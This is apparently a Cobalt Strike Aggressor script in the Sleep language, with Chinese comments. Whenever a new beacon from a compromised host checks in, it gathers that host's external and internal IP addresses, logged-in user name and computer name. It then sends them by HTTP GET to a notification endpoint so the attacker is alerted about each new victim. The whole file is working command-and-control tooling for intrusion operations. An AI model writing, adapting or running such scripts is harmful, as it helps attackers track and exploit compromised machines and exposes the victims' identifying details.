# 循环获取所有beacon
on beacon_initial {

	sub http_get {
		local('$output');
		$url = [new java.net.URL: $1];
		$stream = [$url openStream];
		$handle = [SleepUtils getIOHandle: $stream, $null];

		@content = readAll($handle);

		foreach $line (@content) {
			$output .= $line . "\r\n";
		}
		
		println($output);
	}
	#获取ip、计算机名、登录账号
	$externalIP = replace(beacon_info($1, "external"), " ", "_");
	$internalIP = replace(beacon_info($1, "internal"), " ", "_");
	$userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
	
	#get一下Server酱的链接
	$url = 'http://127.0.0.1:9091/duanxin.php?ip='.$externalIP.'-'.$internalIP.'&uname='.$userName.'&cname='.$computerName;
	
	http_get($url);
	
}


